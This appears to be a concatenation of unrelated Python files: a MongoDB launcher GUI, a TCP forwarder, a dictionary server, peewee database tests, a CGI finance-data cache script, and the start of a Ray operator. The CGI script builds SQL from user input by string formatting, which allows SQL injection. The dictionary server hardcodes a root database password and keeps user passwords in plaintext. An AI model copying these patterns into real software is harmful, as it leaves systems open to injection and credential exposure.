def __init__(self, maxConns=10, noauth=True):
self.maxConns = maxConns
self.noauth = noauth
self.CreateQuery()
def CreateQuery(self):
self.MongoQuery = ' --pidfilepath ' + str(self.pidPath) + \
' --maxConns ' + str(self.maxConns) + \
' --dbpath ' + str(self.dbPath)
if self.noauth:
self.MongoQuery += ' --noauth'
def StartMongo(self):
query = "bin/mongod "+self.MongoQuery
MongoProcess = subprocess.Popen([query], stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
return MongoProcess
def Start(self):
SM = threading.Thread(target=self.StartMongo, args=())
SM.start()
# Application structure:
# http://docs.python.org/2/library/tkinter.html#a-simple-hello-world-program
class Application(Frame):
Mongo = MongoApp(maxConns=100)
Status = 0
def __init__(self, master=None):
Frame.__init__(self, master)
#self.m = master
self.pack(expand=0, fill='both', padx=10, pady=10)
self.ConsoleLogFrame = Frame(master)
self.ConsoleLogFrame.pack(expand=1, fill='both')
self.ActiveIconImage = ImageTk.PhotoImage(
Image.open("assets/images/icon-active.gif"))
self.ErrorIconImage = ImageTk.PhotoImage(
Image.open("assets/images/icon-error.gif"))
self.OffIconImage = ImageTk.PhotoImage(
Image.open("assets/images/icon-off.gif"))
self.MongoDBLogo = ImageTk.PhotoImage(
Image.open("assets/images/MongoDBLogo.gif"))
self.menubar = Menu(self)
MenuRoot = Menu(master, tearoff=0)
MenuBar = Menu(MenuRoot, tearoff=0)
MenuBar.add_command(label="GitHub Page", command=self.LinkGitHubPage)
MenuBar.add_command(label="MongoDB Docs", command=self.LinkMongoDBDocs)
MenuRoot.add_cascade(label="About MongoApp", menu=MenuBar)
master.config(menu=MenuRoot)
self.CreateWidgets()
master.protocol("WM_DELETE_WINDOW", self.QuitEvent)
def LinkGitHubPage(self):
webbrowser.open('https://github.com/yildizberkay/MongoApp')
def LinkMongoDBDocs(self):
webbrowser.open('http://docs.mongodb.org/manual/')
def OpenDBFolder(self):
subprocess.call(["open", DATA_ROOT_FOLDER+"/data"])
def StartServer(self):
self.MongoObject = self.Mongo.StartMongo()
SStatus = 0
while True:
Line = self.MongoObject.stdout.readline()
self.AppendLog(Line)
if str(self.MongoObject.poll()) == 'None':
self.IconPanel.config(image=self.ActiveIconImage)
self.Status = 1
SStatus = 1
elif str(self.MongoObject.poll()) == '100':
SStatus = 0
else:
self.IconPanel.config(image=self.OffIconImage)
if not Line:
break
self.Status = 0
self.MongoObject.stdout.close()
if SStatus == 0:
self.StopButton["state"] = DISABLED
self.StartButton["state"] = NORMAL
self.IconPanel.config(image=self.ErrorIconImage)
self.AppendLog("Error!\n", 'ErrorHead')
self.AppendLog("MongoDB is not working, please check "
"console log.\n", 'NotificationHead')
self.AppendLog("--------------------------------------------------\n",
'NotificationHead')
def StartServerMulti(self):
self.StartButton["state"] = DISABLED
self.StopButton["state"] = NORMAL
self.AppendLog("MongoDB is starting.\n", 'NotificationHead')
self.SM = threading.Thread(target=self.StartServer, args=())
self.SM.setDaemon(1)
self.SM.start()
def StopServer(self):
self.MongoObject.terminate()
self.StopButton["state"] = DISABLED
self.StartButton["state"] = NORMAL
self.Status = 0
def ClearConsole(self):
self.LogArea.delete("0.0", END)
def CreateWidgets(self):
self.StartButton = Button(self)
self.StartButton["text"] = "Start Mongo"
self.StartButton["fg"] = "red"
self.StartButton["command"] = self.StartServerMulti
self.StartButton.pack({"side": "left"})
self.StopButton = Button(self)
self.StopButton["text"] = "Stop"
self.StopButton["command"] = self.StopServer
self.StopButton["state"] = DISABLED
self.StopButton.pack({"side": "left"})
self.GetInfo = Button(self)
self.GetInfo["text"] = "Clear"
self.GetInfo["command"] = self.ClearConsole
self.GetInfo.pack({"side": "left"})
self.OpenFolder = Button(self)
self.OpenFolder["text"] = "Open DB Folder"
self.OpenFolder["command"] = self.OpenDBFolder
self.OpenFolder.pack({"side": "left"})
self.PoweredMongoPanel = Label(self, image=self.MongoDBLogo)
self.PoweredMongoPanel.image = self.MongoDBLogo
self.PoweredMongoPanel.pack({"side": "right"})
self.IconPanel = Label(self, image=self.OffIconImage)
self.IconPanel.image = self.OffIconImage
self.IconPanel.pack({"side": "right"})
self.LogArea = Text(self.ConsoleLogFrame)
self.LogArea["bd"] = "0px"
self.LogArea["bg"] = "black"
self.LogArea["fg"] = "green"
self.LogArea["highlightthickness"] = "0px"
self.LogArea.insert(INSERT, "Click to \"Start Mongo\" button for start"
" the server.\nGitHub repository: "
"http://git.io/MongoApp\nMongoApp version: 0.2.6\n")
self.LogArea.pack(expand=1, fill='both')
self.LogArea.tag_config("NotificationHead", background="#f1c40f",
foreground="#2c3e50")
self.LogArea.tag_config("ErrorHead", background="#e74c3c",
foreground="#ffffff",
font=tkFont.Font(weight='bold'))
def AppendLog(self, logline, tag='None'):
if tag == 'None':
self.LogArea.insert(END, logline)
else:
self.LogArea.insert(END, logline, (tag))
self.LogArea.see('end')
def QuitEvent(self):
if self.Status == 1:
self.MongoObject.terminate()
self.master.destroy()
self.master.quit()
if __name__ == "__main__":
if not exists(DATA_ROOT_FOLDER):
makedirs(DATA_ROOT_FOLDER+"/data/db")
makedirs(DATA_ROOT_FOLDER+"/logs")
root = Tk()
app = Application(master=root)
app.master.title("MongoApp")
app.master.geometry("640x480")
app.mainloop()
|
forwarding.py | #!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2022, Vm, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.cub@gmail.com>
import sys
import time
import queue
import socket
import logging
import threading
logger = logging.getLogger('tcp_forwarding')
logger.setLevel(logging.INFO)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
logger.removeHandler(handler)
stream_handler_fmt = '[%(levelname)s][%(asctime)s][%(filename)s:%(lineno)d] - - %(message)s'
stream_handler_date_fmt = '%Y-%m-%d %H:%M:%S'
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.INFO)
stream_handler.setFormatter(logging.Formatter(stream_handler_fmt, stream_handler_date_fmt))
logger.addHandler(stream_handler)
def get_time():
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
def time_print(msg):
print('[{}] {}'.format(get_time(), msg))
def create_tcp_socket_server(addr, backlog=1, show_log=True):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(addr)
sock.listen(backlog)
logger.info('[TcpSocketServer-{}] listen({}) on {}'.format(id(addr), backlog, addr))
return sock
except Exception as e:
if show_log:
logger.error('Create TcpSocketServer Failed, {}'.format(e))
return None
def create_tcp_socket_client(addr, show_log=True):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect(addr)
logger.info('[TcpSocketClient-{}] Connect {} Success'.format(id(addr), addr))
return sock
except Exception as e:
if show_log:
logger.error('[TcpSocketClient-{}] Create Failed, {}'.format(id(addr), e))
return None
class Forwarding(object):
def __init__(self, sock_in, sock_out, timeout=5):
super().__init__()
self.alive = True
sock_in.setblocking(True)
sock_in.settimeout(timeout)
sock_out.setblocking(True)
sock_out.settimeout(timeout)
in2out_que = queue.Queue() # forwarding from sock_in to sock_out
out2in_que = queue.Queue() # forwarding from sock_out to sock_in
in2out_cond = threading.Condition()
out2in_cond = threading.Condition()
# get data from out2in_que, then send with sock_in
in_send_t = threading.Thread(target=self._send_loop, args=(sock_in, out2in_que, out2in_cond), daemon=True)
# recv data with sock_in, then put to in2out_que
in_recv_t = threading.Thread(target=self._recv_loop, args=(sock_in, in2out_que, in2out_cond), daemon=True)
# get data from in2out_que, then send with sock_out
out_send_t = threading.Thread(target=self._send_loop, args=(sock_out, in2out_que, in2out_cond), daemon=True)
# recv data with sock_out, then put to out2in_que
out_recv_t = threading.Thread(target=self._recv_loop, args=(sock_out, out2in_que, out2in_cond), daemon=True)
self.threads = [in_send_t, in_recv_t, out_send_t, out_recv_t]
for t in self.threads:
t.start()
def join(self):
for t in self.threads:
t.join()
def _send_loop(self, sock, que, cond):
addr = sock.getpeername()
logger.info('[Forwarding] socket_send_loop start, {}'.format(addr))
while self.alive:
# avoid can not quit
if que.qsize() == 0:
# time.sleep(0.001)
# continue
with cond:
cond.wait()
if que.qsize() == 0:
continue
try:
data = que.get()
sock.send(data)
except Exception as e:
# logger.error('[Forwarding] socket_send_exception, {}, {}'.format(e, addr))
break
self.alive = False
logger.info('[Forwarding] socket_send_loop over, {}'.format(addr))
sock.close()
def _recv_loop(self, sock, que, cond):
addr = sock.getpeername()
logger.info('[Forwarding] socket_recv_loop start, {}'.format(addr))
while self.alive:
try:
data = sock.recv(10240)
if data:
que.put(data)
with cond:
cond.notify()
else:
break
except socket.timeout:
# logger.error('[Forwarding] socket recv timeout, {}'.format(addr))
continue
except Exception as e:
# logger.error('[Forwarding] socket_recv_exception, {}, {}'.format(e, addr))
break
self.alive = False
logger.info('[Forwarding] socket_recv_loop over, {}'.format(addr))
with cond:
cond.notify()
sock.close()
|
dictionary_server.py | """
在线字典服务端
"""
from socket import *
from select import *
from multiprocessing import Process
import pymysql
from time import *
# 用于数据库的交互
class Database:
database_args = {
"host": "localhost",
"port": 3306,
"user": "root",
"password": "417355570",
"database": "dict",
"charset": "utf8"
}
def __init__(self):
self.db = pymysql.connect(**Database.database_args)
def close(self):
self.db.close()
# 查询单词解释方法
def find_word(self, word):
self.cur = self.db.cursor()
sql = "select mean from words where word=%s;"
self.cur.execute(sql, [word])
mean = self.cur.fetchone()
if mean:
self.cur.close()
return mean[0]
else:
self.cur.close()
return "Not Found"
def name_not_exist(self, name):
self.cur = self.db.cursor() # 防止游标的数据产生变化 因为游标会操作硬盘
sql = "select name from users"
self.cur.execute(sql)
name_tuple = self.cur.fetchall()
for tuple in name_tuple:
if tuple == (name,):
self.cur.close()
return False
else:
self.cur.close()
return True
def register(self, name, passwd, birthday):
self.cur = self.db.cursor()
if not birthday: # birthday 为空,就不插入
sql = "insert into users(name,passwd) values(%s,%s)"
self.cur.execute(sql, [name, passwd])
self.db.commit()
print("没有插入birthday")
else:
sql = "insert into users(name,passwd,birthday) values(%s,%s,%s)"
try:
self.cur.execute(sql, [name, passwd, birthday])
except Exception as e:
return False
else:
self.db.commit()
print("插入了birthday")
self.cur.close()
return True
def password_same(self, name, passwd):
self.cur = self.db.cursor()
sql = "select passwd from users where name =%s"
self.cur.execute(sql, [name])
passwd_test = self.cur.fetchone()[0]
if passwd_test == passwd:
self.cur.close()
return True
else:
self.cur.close()
return False
def query(self, name, word):
self.cur = self.db.cursor()
sql02 = "select id from users where name=%s"
self.cur.execute(sql02, [name])
user_id = self.cur.fetchone()[0]
sql03 = "insert into history(user_id,word) values(%s,%s)"
self.cur.execute(sql03, [user_id, word])
self.db.commit()
sql01 = "select mean from words where word = %s"
self.cur.execute(sql01, [word])
mean = self.cur.fetchone()
if mean:
self.cur.close()
return mean[0]
else:
self.cur.close()
return "Not Found"
def history(self, name):
"""
:return: ((name,word,query_time),(name,word,query_time))
"""
self.cur = self.db.cursor()
sql = "select name,word,query_time from history left join users on history.user_id=users.id where name =%s;"
self.cur.execute(sql, [name])
history_tuple = self.cur.fetchall()
print(history_tuple)
return history_tuple
class ClientConnector:
def __init__(self):
self.sock = self.connect_client()
self.handle = Handle()
def connect_client(self):
HOST = '0.0.0.0'
PORT = 9999
ADDR = (HOST, PORT)
tcp_socket = socket()
tcp_socket.bind(ADDR)
tcp_socket.listen(5)
return tcp_socket
def io_listener(self):
MAP = {self.sock.fileno(): self.sock}
p = poll()
p.register(self.sock, POLLIN)
# 循环监控发生的IO事件
while True:
events = p.poll()
print("开始监控")
for fd, event in events:
if fd is self.sock.fileno() and event is POLLIN:
connfd, addr = MAP[fd].accept()
print("Connect from", addr)
p.register(connfd, POLLIN)
MAP[connfd.fileno()] = connfd
else:
data = MAP[fd].recv(1024)
if not data:
print("客户端异常退出")
p.unregister(MAP[fd])
MAP[fd].close()
del MAP[fd]
continue
head = data.decode().split("##")
print(head)
command = head[0]
if command == "QUIT":
p.unregister(MAP[fd])
MAP[fd].close()
del MAP[fd]
continue
content = head[1]
self.handle.handle(MAP[fd], command, content)
class Handle:
def __init__(self):
self.database = Database()
def handle(self, connfd, command, content):
if command == "R":
name = content.split(" ")[0]
passwd = content.split(" ")[1]
if content.split(" ")[2]:
birthday = content.split(" ")[2]
else:
birthday = ""
self.register(connfd, name, passwd, birthday)
elif command == "L":
name = content.split(" ")[0]
passwd = content.split(" ")[1]
self.login(connfd, name, passwd)
elif command == "Q":
name = content.split(" ")[0]
word = content.split(" ")[1]
self.query(connfd, name, word)
elif command == "H":
self.history(connfd, content)
elif command == "QUIT":
self.quit(connfd)
def register(self, connfd, name, passwd, birthday):
if self.database.name_not_exist(name): # 判断name是不是在数据库里
out = self.database.register(name, passwd, birthday)
if out:
connfd.send(b"1")
else:
connfd.send(b"2") # 2说明格式不对
else:
connfd.send(b"0")
def login(self, connfd, name, passwd):
if self.database.name_not_exist(name):
connfd.send(b"0")
else:
if self.database.password_same(name, passwd):
connfd.send(b"1")
else:
connfd.send(b"0")
def query(self, connfd, name, word):
mean = self.database.query(name, word)
connfd.send(mean.encode())
def history(self, connfd, name):
history_tuple = self.database.history(name)
for tuple in history_tuple:
msg = f"用户名:{tuple[0]},查询单词:{tuple[1]},查询时间{tuple[2]}"
connfd.send(msg.encode())
sleep(0.05)
connfd.send(b"END")
def quit(self, connfd):
pass
if __name__ == '__main__':
client_connector = ClientConnector()
# p = Process(target=client_process.io_listener(), daemon=True)
# p.start()
client_connector.io_listener()
|
database.py | from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import skip_case_unless
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
database = db_loader('sqlite3')
def test_pragmas(self):
self.database.cache_size = -2048
self.assertEqual(self.database.cache_size, -2048)
self.database.cache_size = -4096
self.assertEqual(self.database.cache_size, -4096)
self.database.foreign_keys = 'on'
self.assertEqual(self.database.foreign_keys, 1)
self.database.foreign_keys = 'off'
self.assertEqual(self.database.foreign_keys, 0)
def test_pragmas_permanent(self):
db = SqliteDatabase(':memory:')
self.assertEqual(db.foreign_keys, 0)
db.pragma('foreign_keys', 1, True)
self.assertEqual(db.foreign_keys, 1)
db.close()
db.connect()
self.assertEqual(db.foreign_keys, 1)
def test_context_settings(self):
class TestDatabase(Database):
field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
operations = {'LIKE': '~', 'NEW': '->>'}
param = '$'
test_db = TestDatabase(None)
state = test_db.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], FIELD.INT)
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
self.assertEqual(state.operations['LIKE'], '~')
self.assertEqual(state.operations['NEW'], '->>')
self.assertEqual(state.operations['ILIKE'], 'ILIKE')
self.assertEqual(state.param, '$')
self.assertEqual(state.quote, '"')
test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
'INT': 'XXX_INT'})
state = test_db2.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], 'XXX_INT')
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
def test_connection_state(self):
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
self.database.close()
self.assertTrue(self.database.is_closed())
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
def test_connection_initialization(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
self.assertEqual(state['count'], 0)
conn = db.connection()
self.assertEqual(state['count'], 1)
# Since already connected, nothing happens here.
conn = db.connection()
self.assertEqual(state['count'], 1)
def test_connect_semantics(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
db.connect()
self.assertEqual(state['count'], 1)
self.assertRaises(OperationalError, db.connect)
self.assertEqual(state['count'], 1)
self.assertFalse(db.connect(reuse_if_open=True))
self.assertEqual(state['count'], 1)
with db:
self.assertEqual(state['count'], 1)
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
with db:
self.assertEqual(state['count'], 2)
def test_execute_sql(self):
self.database.execute_sql('CREATE TABLE register (val INTEGER);')
self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
(1337, 31337))
cursor = self.database.execute_sql(
'SELECT val FROM register ORDER BY val')
self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
self.database.execute_sql('DROP TABLE register;')
class TestThreadSafety(ModelTestCase):
requires = [User]
def test_multiple_writers(self):
def create_users(idx):
n = 10
for i in range(idx * n, (idx + 1) * n):
User.create(username='u%d' % i)
threads = []
for i in range(4):
threads.append(threading.Thread(target=create_users, args=(i,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(User.select().count(), 40)
def test_multiple_readers(self):
data = Queue()
def read_user_count(n):
for i in range(n):
data.put(User.select().count())
threads = []
for i in range(4):
threads.append(threading.Thread(target=read_user_count,
args=(10,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(data.qsize(), 40)
class TestDeferredDatabase(BaseTestCase):
def test_deferred_database(self):
deferred_db = SqliteDatabase(None)
self.assertTrue(deferred_db.deferred)
class DeferredModel(Model):
class Meta:
database = deferred_db
self.assertRaises(Exception, deferred_db.connect)
query = DeferredModel.select()
self.assertRaises(Exception, query.execute)
deferred_db.init(':memory:')
self.assertFalse(deferred_db.deferred)
conn = deferred_db.connect()
self.assertFalse(deferred_db.is_closed())
DeferredModel._schema.create_all()
self.assertEqual(list(DeferredModel.select()), [])
deferred_db.init(None)
self.assertTrue(deferred_db.deferred)
# The connection was automatically closed.
self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
description = TextField()
class Meta:
schema = 'huey'
@skip_case_unless(isinstance(db, PostgresqlDatabase))
class TestSchemaNamespace(ModelTestCase):
requires = [CatToy]
def setUp(self):
with self.database:
self.execute('CREATE SCHEMA huey;')
super(TestSchemaNamespace, self).setUp()
def tearDown(self):
super(TestSchemaNamespace, self).tearDown()
with self.database:
self.execute('DROP SCHEMA huey;')
def test_schema(self):
toy = CatToy.create(description='fur mouse')
toy_db = CatToy.select().where(CatToy.id == toy.id).get()
self.assertEqual(toy.id, toy_db.id)
self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
database = db_loader('sqlite3')
requires = [User]
def test_sqlite_isolation(self):
for username in ('u1', 'u2', 'u3'): User.create(username=username)
new_db = db_loader('sqlite3')
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 3)
self.assertEqual(User.select().count(), 3)
self.assertEqual(User.delete().execute(), 3)
with self.database.atomic():
User.create(username='u4')
User.create(username='u5')
# Second conn does not see the changes.
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Third conn does not see the changes.
new_db2 = db_loader('sqlite3')
curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Original connection sees its own changes.
self.assertEqual(User.select().count(), 2)
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
name = CharField(unique=True)
class IndexedModel(TestModel):
first = CharField()
last = CharField()
dob = DateField()
class Meta:
indexes = (
(('first', 'last', 'dob'), True),
(('first', 'last'), False),
)
class TestIntrospection(ModelTestCase):
requires = [Category, User, UniqueModel, IndexedModel]
def test_table_exists(self):
self.assertTrue(self.database.table_exists(User._meta.table))
self.assertFalse(self.database.table_exists(Table('nuggies')))
def test_get_tables(self):
tables = self.database.get_tables()
required = set(m._meta.table_name for m in self.requires)
self.assertTrue(required.issubset(set(tables)))
UniqueModel._schema.drop_all()
tables = self.database.get_tables()
self.assertFalse(UniqueModel._meta.table_name in tables)
def test_get_indexes(self):
indexes = self.database.get_indexes('uniquemodel')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('uniquemodel_pkey', 'PRIMARY')]
self.assertEqual(data, [
('uniquemodel_name', ['name'], True, 'uniquemodel')])
indexes = self.database.get_indexes('indexedmodel')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('indexedmodel_pkey', 'PRIMARY')]
self.assertEqual(sorted(data), [
('indexedmodel_first_last', ['first', 'last'], False,
'indexedmodel'),
('indexedmodel_first_last_dob', ['first', 'last', 'dob'], True,
'indexedmodel')])
def test_get_columns(self):
columns = self.database.get_columns('indexedmodel')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('id', False, True, 'indexedmodel'),
('first', False, False, 'indexedmodel'),
('last', False, False, 'indexedmodel'),
('dob', False, False, 'indexedmodel')])
columns = self.database.get_columns('category')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('name', False, True, 'category'),
('parent_id', True, False, 'category')])
def test_get_primary_keys(self):
primary_keys = self.database.get_primary_keys('users')
self.assertEqual(primary_keys, ['id'])
primary_keys = self.database.get_primary_keys('category')
self.assertEqual(primary_keys, ['name'])
@requires_models(User, Tweet, Category)
def test_get_foreign_keys(self):
foreign_keys = self.database.get_foreign_keys('tweet')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('user_id', 'users', 'id', 'tweet')])
foreign_keys = self.database.get_foreign_keys('category')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
def test_sort_models(self):
class A(Model):
pass
class B(Model):
a = ForeignKeyField(A)
class C(Model):
b = ForeignKeyField(B)
class D(Model):
c = ForeignKeyField(C)
class E(Model):
pass
models = [A, B, C, D, E]
for list_of_models in permutations(models):
sorted_models = sort_models(list_of_models)
self.assertEqual(sorted_models, models)
class TestDBProxy(BaseTestCase):
def test_db_proxy(self):
db = Proxy()
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
username = TextField()
class Tweet(BaseModel):
user = ForeignKeyField(User, backref='tweets')
message = TextField()
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
self.assertEqual(User._meta.database.database, ':memory:')
self.assertEqual(Tweet._meta.database.database, ':memory:')
self.assertTrue(User._meta.database.is_closed())
self.assertTrue(Tweet._meta.database.is_closed())
sqlite_db.connect()
self.assertFalse(User._meta.database.is_closed())
self.assertFalse(Tweet._meta.database.is_closed())
sqlite_db.close()
|
index.py | #!/usr/bin/pypy3
#!/usr/bin/python3
from urllib.request import urlopen
import cgi
import mysql.connector
from datetime import datetime, timedelta, date
from threading import Thread
import json
def commit(ticker, iinterval, rrange, results, cursor, cnx):
sql1 = "DELETE FROM yahoofinances WHERE ticker='{}' AND iinterval='{}' AND rrange='{}';".format(ticker, iinterval, rrange)
sql2 = "INSERT INTO yahoofinances VALUES('{}', '{}', '{}', '{}', '{}');".format(
ticker,
iinterval,
rrange,
results,
str(datetime.now()))
cursor.execute(sql1)
cnx.commit()
cursor.execute(sql2)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def site(ticker, iinterval, rrange):
if len(ticker) == 7 and ticker[3] == '/':
ticker = ticker[:3] + ticker[4:] + '=X'
results = urlopen('https://query1.finance.yahoo.com/v8/finance/chart/{}?interval={}&range={}'.format(ticker, iinterval, rrange)).read().decode('utf-8')
return results
def main():
form = cgi.FieldStorage()
try:
ticker = str(form['ticker_symbol'].value)
except:
return {'error': 'Invalid parameter'}
try:
iinterval = str(form['interval'].value)
except:
iinterval = '1d'
try:
rrange = str(form['range'].value)
except:
rrange = '1y'
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM yahoofinances WHERE ticker='{}' AND iinterval='{}' AND rrange='{}';".format(ticker, iinterval, rrange)
cursor.execute(sql)
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=1)) > data[4]:
raise IndexError('expired')
cache_results = data[3]
cursor.close()
cnx.close()
except:
cache_expired = True
fetch_results = site(ticker, iinterval, rrange)
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(ticker, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
output = json.loads(results)
if iinterval == '1d' and rrange == '1y':
yesterday = datetime.combine(datetime.utcnow().date(), datetime.min.time())-timedelta(hours=24)
while len(output['chart']['result'][0]['timestamp']) > 250:
if datetime.utcfromtimestamp(output['chart']['result'][0]['timestamp'][-1]+output['chart']['result'][0]['meta']['gmtoffset']) > yesterday:
output['chart']['result'][0]['timestamp'].pop()
output['chart']['result'][0]['indicators']['quote'][0]['low'].pop()
output['chart']['result'][0]['indicators']['quote'][0]['high'].pop()
output['chart']['result'][0]['indicators']['quote'][0]['open'].pop()
output['chart']['result'][0]['indicators']['quote'][0]['close'].pop()
output['chart']['result'][0]['indicators']['quote'][0]['volume'].pop()
output['chart']['result'][0]['indicators']['adjclose'][0]['adjclose'].pop()
else:
output['chart']['result'][0]['timestamp'].pop(0)
output['chart']['result'][0]['indicators']['quote'][0]['low'].pop(0)
output['chart']['result'][0]['indicators']['quote'][0]['high'].pop(0)
output['chart']['result'][0]['indicators']['quote'][0]['open'].pop(0)
output['chart']['result'][0]['indicators']['quote'][0]['close'].pop(0)
output['chart']['result'][0]['indicators']['quote'][0]['volume'].pop(0)
output['chart']['result'][0]['indicators']['adjclose'][0]['adjclose'].pop(0)
return json.dumps(output)
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
operator.py | import logging
import multiprocessing as mp
import os
import time
import threading
from typing import Any
from typing import Callable
from typing import Dict
from typing import Tuple
from typing import Optional
from kubernetes.client.exceptions import ApiException
import yaml
import ray.autoscaler._private.monitor as monitor
from ray._private import services
from ray.autoscaler._private import commands
from ray.ray_operator import operator_utils
from ray.ray_operator.operator_utils import AUTOSCALER_RETRIES_FIELD
from ray.ray_operator.operator_utils import STATUS_AUTOSCALING_EXCEPTION
from ray.ray_operator.operator_utils import STATUS_ERROR
from ray.ray_operator.operator_utils import STATUS_RUNNING
from ray.ray_operator.operator_utils import STATUS_UPDATING
from ray import ray_constants
logger = logging.getLogger(__name__)
# Queue to process cluster status updates.
cluster_status_q = mp.Queue() # type: mp.Queue[Tuple[str, str, str]]
class RayCluster():
"""Manages an autoscaling Ray cluster.
Attributes:
config: Autoscaling configuration dict.
subprocess: The subprocess used to create, update, and monitor the
Ray cluster.
"""
def __init__(self, config: Dict[str, Any]):
self.config = config
self.name = self.config["cluster_name"]
self.namespace = self.config["provider"]["namespace"]
# Make directory for configs of clusters in the namespace,
# if the directory doesn't exist already.
namespace_dir = operator_utils.namespace_dir(self.namespace)
if not os.path.isdir(namespace_dir):
os.mkdir(namespace_dir)
self.config_path = operator_utils.config_path(
cluster_namespace=self.namespace, cluster_name=self.name)
# Tracks metadata.generation field of associated custom resource.
# K8s increments this field whenever the spec of the custom resource is
# updated.
self._generation = 0
# Tracks metadata.labels.autoscalerRetries field of the CR.
# The operator increments this field whenever we attempt recovery from
# autoscaler failure.
self._num_retries = 0
# Monitor subprocess
self.subprocess = None # type: Optional[mp.Process]
# Monitor logs for this cluster will be prefixed by the monitor
# subprocess name:
self.subprocess_name = ",".join([self.name, self.namespace])
self.monitor_stop_event = mp.Event()
self.setup_logging()
def create_or_update(self, restart_ray: bool = False) -> None:
""" Create/update the Ray Cluster and run the monitoring loop, all in a
subprocess.
The main function of the Operator is managing the
subprocesses started by this method.
Args:
restart_ray: If True, restarts Ray to recover from failure.
"""
self.do_in_subprocess(self._create_or_update, args=(restart_ray, ))
def _create_or_update(self, restart_ray: bool = False) -> None:
try:
self.start_head(restart_ray=restart_ray)
self.start_monitor()
except Exception:
# Report failed autoscaler status to trigger cluster restart.
cluster_status_q.put((self.name, self.namespace,
STATUS_AUTOSCALING_EXCEPTION))
# `status_handling_loop` will increment the
# `status.AutoscalerRetries` of the CR. A restart will trigger
# at the subsequent "MODIFIED" event.
raise
def start_head(self, restart_ray: bool = False) -> None:
self.write_config()
# Don't restart Ray on head unless recovering from failure.
no_restart = not restart_ray
# Create or update cluster head and record config side effects.
self.config = commands.create_or_update_cluster(
self.config_path,
override_min_workers=None,
override_max_workers=None,
no_restart=no_restart,
restart_only=False,
yes=True,
no_config_cache=True,
no_monitor_on_head=True)
# Write the resulting config for use by the autoscaling monitor:
self.write_config()
def start_monitor(self) -> None:
"""Runs the autoscaling monitor."""
ray_head_pod_ip = commands.get_head_node_ip(self.config_path)
port = operator_utils.infer_head_port(self.config)
redis_address = services.address(ray_head_pod_ip, port)
self.mtr = monitor.Monitor(
redis_address=redis_address,
autoscaling_config=self.config_path,
redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
prefix_cluster_info=True,
